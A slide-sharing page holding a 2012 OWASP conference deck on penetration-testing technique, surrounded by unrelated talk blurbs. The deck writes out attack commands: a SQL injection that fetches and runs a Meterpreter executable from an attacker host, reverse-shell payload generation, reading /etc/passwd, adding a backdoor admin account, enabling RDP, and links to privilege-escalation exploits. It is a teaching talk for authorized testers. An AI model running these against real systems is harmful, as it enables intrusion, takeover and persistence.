This talk is about how to solve practical challenges faced during pen-testing and exploits. Will help you to understand how it can be done efficiently. Will explore various tips and tricks about it. It will try to solve the common questions like:
0. How do I prepare? What kind of tools I should have?
1. I need to scan the entire network in a faster way?
2. How can I get more accurate results for scanning and fingerprinting?
3. Nessus says it is vulnerable but how can I exploit?
4. What if I know it is vulnerable but I don’t have any exploits available?
5. I am inside the box, compromised it, now what to do?
In short, it will show you the pain points of a typical pen-testing exercise how to deal with it and will help you to reach to “42”, the answer to life, the universe and everything.
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey GordeychikCODE BLUE
The boom of AI brought to the market a set of impressive solutions both on the hardware and software side. On the other hand, massive implementation of AI in various areas brings about problems, and security is one of the greatest concerns.
In this talk we will present results of hands-on vulnerability research of different components of AI infrastructure including NVIDIA DGX GPU servers, ML frameworks such as Pytorch, Keras and Tensorflow, data processing pipelines and specific applications, including Medical Imaging and face recognition powered CCTV. Updated Internet Census toolkit based on the Grinder framework will be introduced.
Escape the defaults - Configure Sling like AEM as a Cloud ServiceRobert Munteanu
AEM as a Cloud Service is using the same battle-tested core of Sling, Felix and Jackrabbit Oak that you are used to. Many of the large-scale architectural changes, such as container-based deployments, separation of code and content, horizontal and vertical scaling, etc, are made possible by a host of reimplementations of APIs exposed by the open-source projects that serve as the foundation of AEM.
In this talk we will explore a number of such extensions and their implications, such as Oak's principal-based authorization, getting up and running with the composite node store, or indexing in a separation of content and apps scenario.
After this talk participants will have a better understanding of various under-the-hood changes present in AEM as a Cloud Service and their practical implications for AEM development. They will also be able to set up their own tweaked Sling instance so they can experiment with such a setup.
JDK Mission Control: Where We Are, Where We Are Going [Code One 2019]David Buck
With the recent open-sourcing of JDK Mission Control, there is even more interest in Java Mission Control and Java Flight Recorder than ever. A lot has changed, but these tools still remain on the forefront of debugging and troubleshooting Java issues, both during development and in production. This session covers these recent changes, migrating from earlier versions, and what the JDK Mission Control community’s plans are for the future.
В последнее время все чаще происходят сложные целенаправленные атаки (APT) с использованием скрытой загрузки. Существующие системы автоанализа, как правило, не способны анализировать вредоносное ПО, используемое для APT-атак, и исследователи вредоносного ПО вынуждены анализировать его вручную. Докладчик представит новую систему автоанализа памяти в режиме реального времени (Malware Analyst). Данная система не генерирует дамп памяти при помощи LibVMI, а имеет непосредственный доступ в память для ускорения диагностики и четко распознает подозрительное поведение вредоносного ПО.
Introducing Intelligence Into Your Malware AnalysisBrian Baskin
With malware becoming more prevalent, and the pool of capable reversers falling short of overall need, there is a greater need to provide quick and efficient malware analysis for network defense. While many analysts have a grasp on how to appropriately reverse malware, there is large room for improvement by extracting critical indicators, correlating on key details, and cataloging artifacts in a way to improve your corporate response for the next attack. This talk will cover beyond the basics of malware analysis and focus on critical indicators that should analysts should focus on for attribution and better reporting.
Внедрение безопасности в веб-приложениях в среде выполненияPositive Hack Days
В данной работе рассматриваются результаты исследования по реализации алгоритма исправления ошибок в приложении в среде выполнения. Исследование проводилось на приложении с незащищенным кодом с целью его защиты от внедрения кода и других уязвимостей веб-приложений. Также в работе будет представлена технология защиты веб-приложений нового поколения под названием Runtime Application Self-Protection (RASP) (самозащита приложения в среде выполнения), которая защищает от веб-атак, работая внутри веб-приложения. Технология RASP основана на исправлении ошибок в среде выполнения путем «внедрения» безопасности в веб-приложения в неявном виде, без внесения дополнительных изменений в код. В завершении доклада перечисляются основные проблемы при реализации этой новой технологии и обзор перспектив защиты среды выполнения.
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey GordeychikCODE BLUE
The boom of AI brought to the market a set of impressive solutions both on the hardware and software side. On the other hand, massive implementation of AI in various areas brings about problems, and security is one of the greatest concerns.
In this talk we will present results of hands-on vulnerability research of different components of AI infrastructure including NVIDIA DGX GPU servers, ML frameworks such as Pytorch, Keras and Tensorflow, data processing pipelines and specific applications, including Medical Imaging and face recognition powered CCTV. Updated Internet Census toolkit based on the Grinder framework will be introduced.
Escape the defaults - Configure Sling like AEM as a Cloud ServiceRobert Munteanu
AEM as a Cloud Service is using the same battle-tested core of Sling, Felix and Jackrabbit Oak that you are used to. Many of the large-scale architectural changes, such as container-based deployments, separation of code and content, horizontal and vertical scaling, etc, are made possible by a host of reimplementations of APIs exposed by the open-source projects that serve as the foundation of AEM.
In this talk we will explore a number of such extensions and their implications, such as Oak's principal-based authorization, getting up and running with the composite node store, or indexing in a separation of content and apps scenario.
After this talk participants will have a better understanding of various under-the-hood changes present in AEM as a Cloud Service and their practical implications for AEM development. They will also be able to set up their own tweaked Sling instance so they can experiment with such a setup.
JDK Mission Control: Where We Are, Where We Are Going [Code One 2019]David Buck
With the recent open-sourcing of JDK Mission Control, there is even more interest in Java Mission Control and Java Flight Recorder than ever. A lot has changed, but these tools still remain on the forefront of debugging and troubleshooting Java issues, both during development and in production. This session covers these recent changes, migrating from earlier versions, and what the JDK Mission Control community’s plans are for the future.
В последнее время все чаще происходят сложные целенаправленные атаки (APT) с использованием скрытой загрузки. Существующие системы автоанализа, как правило, не способны анализировать вредоносное ПО, используемое для APT-атак, и исследователи вредоносного ПО вынуждены анализировать его вручную. Докладчик представит новую систему автоанализа памяти в режиме реального времени (Malware Analyst). Данная система не генерирует дамп памяти при помощи LibVMI, а имеет непосредственный доступ в память для ускорения диагностики и четко распознает подозрительное поведение вредоносного ПО.
Introducing Intelligence Into Your Malware AnalysisBrian Baskin
With malware becoming more prevalent, and the pool of capable reversers falling short of overall need, there is a greater need to provide quick and efficient malware analysis for network defense. While many analysts have a grasp on how to appropriately reverse malware, there is large room for improvement by extracting critical indicators, correlating on key details, and cataloging artifacts in a way to improve your corporate response for the next attack. This talk will cover beyond the basics of malware analysis and focus on critical indicators that should analysts should focus on for attribution and better reporting.
Внедрение безопасности в веб-приложениях в среде выполненияPositive Hack Days
В данной работе рассматриваются результаты исследования по реализации алгоритма исправления ошибок в приложении в среде выполнения. Исследование проводилось на приложении с незащищенным кодом с целью его защиты от внедрения кода и других уязвимостей веб-приложений. Также в работе будет представлена технология защиты веб-приложений нового поколения под названием Runtime Application Self-Protection (RASP) (самозащита приложения в среде выполнения), которая защищает от веб-атак, работая внутри веб-приложения. Технология RASP основана на исправлении ошибок в среде выполнения путем «внедрения» безопасности в веб-приложения в неявном виде, без внесения дополнительных изменений в код. В завершении доклада перечисляются основные проблемы при реализации этой новой технологии и обзор перспектив защиты среды выполнения.
Docker on a local machine and Docker in production — are two big differences. It's easy to play with technology but it's hard to do something real for many customers.
Half a year ago inside of Alpha Laboratory (division of Alfa-Bank) we've started building new microservices architecture for one of our pilot projects. We've almost completely changed a stack of the used technologies on a frontend and significantly changed it on a middle layer. For package and distribution we have choosen Docker. Two months ago we've deployed project to production and have opened service for clients.
In the report the following topics will be covered:
- reasons of a choice Docker;
- why Docker without other tools is not enough for a production;
- what stack of technologies we used in our solution;
- what advantages we've got;
- what problems have been faced and how we've solved them.
SAP strikes back Your SAP server now counter attacks.Dmitry Iudin
In this presentation, we will demonstrate how attackers can compromise all SAP clients and gain private information from their machines by using the SAP server.
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...VISEO
What’s new in Microsoft ALM 2013, the parts that is 100% running on Windows Azure, now called VISUAL STUDIO ONLINE !!
by Vincent Thavonekham, Objet Direct
This talk will walk everyone through the concept and practical usage of JavaScript module bundling and optimisation. With the emergence of advanced bundling tools like Webpack, the JavaScript ecosystem has been enriched with the right set of processes and tools required for creating production-ready builds, which is what this talk aims at covering.
This talk will also cover essential differences between task runners and bundlers with focus on advanced optimisation techniques like Tree shaking and Code splitting.
Good practices for debugging Selenium and Appium testsAbhijeet Vaikar
We often come across situations when:
> We cannot figure out why our Selenium/Appium scripts fail during execution either locally or on CI.
> We need to debug scripts locally while writing them but find debugging painful and slow
Debugging the scripts is often the approach to fix them. What all different ways we can do it?
I shared about some of the good practices I have used for debugging Selenium and Appium scripts
Presentation from Cloud Expo Asia Hong Kong covering the rationale for "Compliance as Code" and how InSpec may be applied to servers, cloud platforms, and much more to keep track of your compliance everywhere.
The why and how of moving to PHP 5.5/5.6Wim Godden
With PHP 5.6 out and many production environments still running 5.2 or 5.3, it's time to paint a clear picture on why everyone should move to 5.5 and 5.6 and how to get code ready for the latest version of PHP. In this talk, we'll look at some handy tools and techniques to ease the migration.
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...Rosemary Wang
Thoughtworks Tech Talks NYC, 11/30
We built an application or a platform! However, we soon realize that it is t-minus two weeks before release and we have no way of supporting it when it goes to production. Operations has not been trained, no one will know if a component goes down, and somehow the pipeline used in testing does not work in production. Oops. In this talk, we'll cover ten tips from the operations battlefront to remember as you develop an application or platform. With a focus on operations as a user and designing for support, these tips range from reminders on systems quirks to practices on engaging operations early in the development process. By taking a bit of an "operations" mindset in the development process, we can ease the release process and move closer to DevOps culture.
ROCm and Distributed Deep Learning on Spark and TensorFlowDatabricks
ROCm, the Radeon Open Ecosystem, is an open-source software foundation for GPU computing on Linux. ROCm supports TensorFlow and PyTorch using MIOpen, a library of highly optimized GPU routines for deep learning. In this talk, we describe how Apache Spark is a key enabling platform for distributed deep learning on ROCm, as it enables different deep learning frameworks to be embedded in Spark workflows in a secure end-to-end machine learning pipeline. We will analyse the different frameworks for integrating Spark with Tensorflow on ROCm, from Horovod to HopsML to Databrick's Project Hydrogen. We will also examine the surprising places where bottlenecks can surface when training models (everything from object stores to the Data Scientists themselves), and we will investigate ways to get around these bottlenecks. The talk will include a live demonstration of training and inference for a Tensorflow application embedded in a Spark pipeline written in a Jupyter notebook on Hopsworks with ROCm.
The Metaverse and AI: how can decision-makers harness the Metaverse for their...Jen Stirrup
The Metaverse is popularized in science fiction, and now it is becoming closer to being a part of our daily lives through the use of social media and shopping companies. How can businesses survive in a world where Artificial Intelligence is becoming the present as well as the future of technology, and how does the Metaverse fit into business strategy when futurist ideas are developing into reality at accelerated rates? How do we do this when our data isn't up to scratch? How can we move towards success with our data so we are set up for the Metaverse when it arrives?
How can you help your company evolve, adapt, and succeed using Artificial Intelligence and the Metaverse to stay ahead of the competition? What are the potential issues, complications, and benefits that these technologies could bring to us and our organizations? In this session, Jen Stirrup will explain how to start thinking about these technologies as an organisation.
Docker on a local machine and Docker in production — are two big differences. It's easy to play with technology but it's hard to do something real for many customers.
Half a year ago inside of Alpha Laboratory (division of Alfa-Bank) we've started building new microservices architecture for one of our pilot projects. We've almost completely changed a stack of the used technologies on a frontend and significantly changed it on a middle layer. For package and distribution we have choosen Docker. Two months ago we've deployed project to production and have opened service for clients.
In the report the following topics will be covered:
- reasons of a choice Docker;
- why Docker without other tools is not enough for a production;
- what stack of technologies we used in our solution;
- what advantages we've got;
- what problems have been faced and how we've solved them.
SAP strikes back Your SAP server now counter attacks.Dmitry Iudin
In this presentation, we will demonstrate how attackers can compromise all SAP clients and gain private information from their machines by using the SAP server.
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...VISEO
What’s new in Microsoft ALM 2013, the parts that is 100% running on Windows Azure, now called VISUAL STUDIO ONLINE !!
by Vincent Thavonekham, Objet Direct
This talk will walk everyone through the concept and practical usage of JavaScript module bundling and optimisation. With the emergence of advanced bundling tools like Webpack, the JavaScript ecosystem has been enriched with the right set of processes and tools required for creating production-ready builds, which is what this talk aims at covering.
This talk will also cover essential differences between task runners and bundlers with focus on advanced optimisation techniques like Tree shaking and Code splitting.
Good practices for debugging Selenium and Appium testsAbhijeet Vaikar
We often come across situations when:
> We cannot figure out why our Selenium/Appium scripts fail during execution either locally or on CI.
> We need to debug scripts locally while writing them but find debugging painful and slow
Debugging the scripts is often the approach to fix them. What all different ways we can do it?
I shared about some of the good practices I have used for debugging Selenium and Appium scripts
Presentation from Cloud Expo Asia Hong Kong covering the rationale for "Compliance as Code" and how InSpec may be applied to servers, cloud platforms, and much more to keep track of your compliance everywhere.
The why and how of moving to PHP 5.5/5.6Wim Godden
With PHP 5.6 out and many production environments still running 5.2 or 5.3, it's time to paint a clear picture on why everyone should move to 5.5 and 5.6 and how to get code ready for the latest version of PHP. In this talk, we'll look at some handy tools and techniques to ease the migration.
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...Rosemary Wang
Thoughtworks Tech Talks NYC, 11/30
We built an application or a platform! However, we soon realize that it is t-minus two weeks before release and we have no way of supporting it when it goes to production. Operations has not been trained, no one will know if a component goes down, and somehow the pipeline used in testing does not work in production. Oops. In this talk, we'll cover ten tips from the operations battlefront to remember as you develop an application or platform. With a focus on operations as a user and designing for support, these tips range from reminders on systems quirks to practices on engaging operations early in the development process. By taking a bit of an "operations" mindset in the development process, we can ease the release process and move closer to DevOps culture.
ROCm and Distributed Deep Learning on Spark and TensorFlowDatabricks
ROCm, the Radeon Open Ecosystem, is an open-source software foundation for GPU computing on Linux. ROCm supports TensorFlow and PyTorch using MIOpen, a library of highly optimized GPU routines for deep learning. In this talk, we describe how Apache Spark is a key enabling platform for distributed deep learning on ROCm, as it enables different deep learning frameworks to be embedded in Spark workflows in a secure end-to-end machine learning pipeline. We will analyse the different frameworks for integrating Spark with Tensorflow on ROCm, from Horovod to HopsML to Databrick's Project Hydrogen. We will also examine the surprising places where bottlenecks can surface when training models (everything from object stores to the Data Scientists themselves), and we will investigate ways to get around these bottlenecks. The talk will include a live demonstration of training and inference for a Tensorflow application embedded in a Spark pipeline written in a Jupyter notebook on Hopsworks with ROCm.
The Metaverse and AI: how can decision-makers harness the Metaverse for their...Jen Stirrup
The Metaverse is popularized in science fiction, and now it is becoming closer to being a part of our daily lives through the use of social media and shopping companies. How can businesses survive in a world where Artificial Intelligence is becoming the present as well as the future of technology, and how does the Metaverse fit into business strategy when futurist ideas are developing into reality at accelerated rates? How do we do this when our data isn't up to scratch? How can we move towards success with our data so we are set up for the Metaverse when it arrives?
How can you help your company evolve, adapt, and succeed using Artificial Intelligence and the Metaverse to stay ahead of the competition? What are the potential issues, complications, and benefits that these technologies could bring to us and our organizations? In this session, Jen Stirrup will explain how to start thinking about these technologies as an organisation.
Essentials of Automations: The Art of Triggers and Actions in FMESafe Software
In this second installment of our Essentials of Automations webinar series, we’ll explore the landscape of triggers and actions, guiding you through the nuances of authoring and adapting workspaces for seamless automations. Gain an understanding of the full spectrum of triggers and actions available in FME, empowering you to enhance your workspaces for efficient automation.
We’ll kick things off by showcasing the most commonly used event-based triggers, introducing you to various automation workflows like manual triggers, schedules, directory watchers, and more. Plus, see how these elements play out in real scenarios.
Whether you’re tweaking your current setup or building from the ground up, this session will arm you with the tools and insights needed to transform your FME usage into a powerhouse of productivity. Join us to discover effective strategies that simplify complex processes, enhancing your productivity and transforming your data management practices with FME. Let’s turn complexity into clarity and make your workspaces work wonders!
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdfPeter Spielvogel
Building better applications for business users with SAP Fiori.
• What is SAP Fiori and why it matters to you
• How a better user experience drives measurable business benefits
• How to get started with SAP Fiori today
• How SAP Fiori elements accelerates application development
• How SAP Build Code includes SAP Fiori tools and other generative artificial intelligence capabilities
• How SAP Fiori paves the way for using AI in SAP apps
Climate Impact of Software Testing at Nordic Testing DaysKari Kakkonen
My slides at Nordic Testing Days 6.6.2024
Climate impact / sustainability of software testing discussed on the talk. ICT and testing must carry their part of global responsibility to help with the climat warming. We can minimize the carbon footprint but we can also have a carbon handprint, a positive impact on the climate. Quality characteristics can be added with sustainability, and then measured continuously. Test environments can be used less, and in smaller scale and on demand. Test techniques can be used in optimizing or minimizing number of tests. Test automation can be used to speed up testing.
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
A tale of scale & speed: How the US Navy is enabling software delivery from l...sonjaschweigert1
Rapid and secure feature delivery is a goal across every application team and every branch of the DoD. The Navy’s DevSecOps platform, Party Barge, has achieved:
- Reduction in onboarding time from 5 weeks to 1 day
- Improved developer experience and productivity through actionable findings and reduction of false positives
- Maintenance of superior security standards and inherent policy enforcement with Authorization to Operate (ATO)
Development teams can ship efficiently and ensure applications are cyber ready for Navy Authorizing Officials (AOs). In this webinar, Sigma Defense and Anchore will give attendees a look behind the scenes and demo secure pipeline automation and security artifacts that speed up application ATO and time to production.
We will cover:
- How to remove silos in DevSecOps
- How to build efficient development pipeline roles and component templates
- How to deliver security artifacts that matter for ATO’s (SBOMs, vulnerability reports, and policy evidence)
- How to streamline operations with automated policy checks on container images
Welcome to the first live UiPath Community Day Dubai! Join us for this unique occasion to meet our local and global UiPath Community and leaders. You will get a full view of the MEA region's automation landscape and the AI Powered automation technology capabilities of UiPath. Also, hosted by our local partners Marc Ellis, you will enjoy a half-day packed with industry insights and automation peers networking.
📕 Curious on our agenda? Wait no more!
10:00 Welcome note - UiPath Community in Dubai
Lovely Sinha, UiPath Community Chapter Leader, UiPath MVPx3, Hyper-automation Consultant, First Abu Dhabi Bank
10:20 A UiPath cross-region MEA overview
Ashraf El Zarka, VP and Managing Director MEA, UiPath
10:35: Customer Success Journey
Deepthi Deepak, Head of Intelligent Automation CoE, First Abu Dhabi Bank
11:15 The UiPath approach to GenAI with our three principles: improve accuracy, supercharge productivity, and automate more
Boris Krumrey, Global VP, Automation Innovation, UiPath
12:15 To discover how Marc Ellis leverages tech-driven solutions in recruitment and managed services.
Brendan Lingam, Director of Sales and Business Development, Marc Ellis
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™UiPathCommunity
In questo evento online gratuito, organizzato dalla Community Italiana di UiPath, potrai esplorare le nuove funzionalità di Autopilot, il tool che integra l'Intelligenza Artificiale nei processi di sviluppo e utilizzo delle Automazioni.
📕 Vedremo insieme alcuni esempi dell'utilizzo di Autopilot in diversi tool della Suite UiPath:
Autopilot per Studio Web
Autopilot per Studio
Autopilot per Apps
Clipboard AI
GenAI applicata alla Document Understanding
👨🏫👨💻 Speakers:
Stefano Negro, UiPath MVPx3, RPA Tech Lead @ BSP Consultant
Flavio Martinelli, UiPath MVP 2023, Technical Account Manager @UiPath
Andrei Tasca, RPA Solutions Team Lead @NTT Data
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
Accelerate your Kubernetes clusters with Varnish Caching
Public exploit held private : Penetration Testing the researcher’s way
1. OWASP InfoSec India Conference 2012
August 24th – 25th, 2012 The OWASP Foundation
Hotel Crowne Plaza, Gurgaon http://www.owasp.org
http://www.owasp.in
Public exploit held private :
Penetration Testing the
researcher’s way
Tamaghna Basu
GCIH, OSCP, RHCE, CEH, ECSA
tamaghna.basu@gmail.com
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
2. DISCLAIMER!
This presentation contains materials on the evolution
of a pen tester which is solely based on the
perspective of the speaker which might contradict
with opinions of individuals.
All the scenarios explained here are fictional even
though they might resemble to realistic situations.
Even though no harm intended, if it causes any
discomfort to you spiritually and/or physically, the
speaker, organizers, hotel authority, climate control
people and the person sitting next to you will not be
responsible for that.
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 2
3. Setting the context
Why Pentesting?
How do you do it?
To VA or to PT… That’s the question.
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 3
4. Setting the context
Terminologies
Vulnerability
Exploit
Payload
Reverse shell
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 4
5. Basics
Pentesting
Internal
External
Automated -> review the report -> get the
final report
Manual -> run few basic tools -> get the
report done
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 5
6. Basics…
Pentesting Steps
Recon and Scanning
Exploit
Maintain Access
Clean up
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 6
7. Scanning
Why?
Identify the live hosts
OS fingerprinting
Service fingerprinting
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 7
8. Scanning
Desi Jugaad
Ping sweep / shell scripts
Decent tools (But indecent usage)
NMAP (behold the power of NSE)
Others?
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 8
9. Desi Jugaad (Local Hack)
Ping Sweep
Windows
FOR /L %i in (1,1,255) do @ping -n 1 192.168.153.%i | find "Reply“
Linux
#!/bin/bash
for ip in $(seq 1 254); do
ping -c 1 192.168.15.$ip | grep "bytes from" | cut -d" " -f 4 | cut -d":" -f 1 &
done
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 9
10. Scanning
Problem!
It is taking too long to scan, need to go for
lunch…
Is it really a windows box but looks like a
Linux box? Or which version?
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 10
13. Nmap Scripts
• Shared files and folders
• nmap --script=smb-enum-shares 192.168.80.129
• Check for SMB vulnerabilities
• nmap --script=smb-check-vulns 192.168.80.129
• Scan for machines that use default Ms sql username,password
• nmap --script=ms-sql-info 192.168.80.129
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 13
14. Scanning
I have Nessus. Why to go through so much
pain?
I don’t have Nessus. What to do?
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 14
15. Exploit
Motive
To gain access
Data
Command execution
Destroy everything!
Categories
Service level
OS
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 15
16. Exploit
What to exploit?
FTP?
HTTP?
SNMP?
What else?
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 16
17. Exploit
FTP
Server Exploit – Buffer Overflow
Fuzzing???
Bruteforce
SNMP
What to do?
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 17
18. FTP Tips
Windows
echo open 192.168.12.124 > ftp.txt
echo ftp>> ftp.txt
echo ftp>> ftp.txt
echo bin >> ftp.txt
echo get met2.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 18
19. FTP Tips
Linux
echo quote user ftp>> ftp.txt
quote user ftp
echo quote pass ftp>>ftp.txt
echo verbose>>ftp.txt
echo binary >> ftp.txt
echo get exploit.c >> ftp.txt
echo bye >> ftp.txt
cat ftp.txt|ftp -n 192.168.12.124
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 19
20. Exploit
HTTP
Server Exploit
Command Execution
Web Shells
SQLi
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 20
22. SQLi Tips
' or 1=1;exec master..xp_cmdshell 'echo open
192.168.12.124> ftpmet.txt';exec
master..xp_cmdshell 'echo test>>
ftpmet.txt';exec master..xp_cmdshell 'echo
test>> ftpmet.txt';exec master..xp_cmdshell
'echo bin>> ftpmet.txt';exec
master..xp_cmdshell 'echo get met.exe>>
ftpmet.txt';exec master..xp_cmdshell 'echo
bye';exec master..xp_cmdshell 'ftp -
s:ftpmet.txt';exec master..xp_cmdshell
'met.exe';--
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 22
23. SQLi Tips
My SQL non-interactive
"mysql --host=127.0.0.1 --user=root --
password=‘password' -e "use mysql; show
tables;"
"mysql --host=127.0.0.1 --user=root --
password=‘password' -e "SELECT
LOAD_FILE('/etc/passwd') INTO dumpfile
'/tmp/passwd';"
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 23
24. Exploit
Metasploit
Use Exploit
Set payload
exploit
Any other options?
How about writing own exploit (at free time)
(out of scope)
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 24
25. L33t love story
Exploit’s love letter to the machine
PAYLOAD…
Which courier?
MSF – set payload
Custom program – msfpayload
Bad characters
Executable - msfpayload
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 25
26. Payload Generator
meterpreter msfpayload
options:
./msfpayload windows/meterpreter/reverse_tcp O
Create exe:
./msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.14.15 LPORT=4321 X > /var/ftp/met.exe
Generate shellcode:
./msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.14.15 LPORT=4321 C
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 26
27. From msf:
use exploit/multi/handler
set PAYLOAD
windows/meterpreter/reverse_tcp
set LHOST 192.168.1.40
set LPORT 80
show options
exploit
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 27
28. Exploit
I am in, what to do?
Secure access?
Add user
Open a port
I like it the reverse way
meterpreter
Dude, did you get root/admin acces?
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 28
29. Add User
Windows Shell
net user hacker hacker123 /add
net localgroup administrators hacker /add
Meterpreter
use incognito
add_user hacker hacker123
add_localgroup_user Administrators hacker
RDP enable reg add
"HKEY_LOCAL_MACHINESYSTEMCurrentControlSet
ControlTerminal Server" /v fDenyTSConnections /t
REG_DWORD /d 0 /f
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 29
30. Privilege Escalation
Categories
Service level
OS
Problem!
How can I transfer my exploit there?
Netcat
FTP
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 30
31. Kernel Exploits
Linux Kernel <= 2.6.36-rc8 http://www.exploit-
db.com/exploits/15285/
Linux Kernel 2.4/2.6 http://www.exploit-
db.com/exploits/9545/
Linux Kernel 2.6 http://www.exploit-
db.com/exploits/8478/
Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5
http://www.exploit-db.com/exploits/9844/
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 31
32. Windows Exploits
Windows Vista, 7, 2008 http://www.exploit-
db.com/exploits/15609/
Windows XP, 2003 http://www.exploit-
db.com/exploits/18176/
Linux + NT priv esc http://www.exploit-
db.com/exploits/9301/
Windows XP SP2, SP3 http://www.exploit-
db.com/exploits/9301/
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 32
33. Pivoting…
Huh?
Why do I need it?
How do I do it?
nc + port forwarding
Ssh tunneling
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 33
34. Fuzzing…
My favorite but last thing I prefer to do on
my own
Python rocks!
Basic
Advanced
SEH handler
Egg hunting shellcode
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 34
35. Did I miss anything?
Questions
Perspectives
Comments
tamaghna.basu@gmail.com
twitter.com/titanlambda
linkedin.com/in/tamaghnabasu
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 35
36. Thank you
tamaghna.basu@gmail.com
twitter.com/titanlambda
linkedin.com/in/tamaghnabasu
36
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)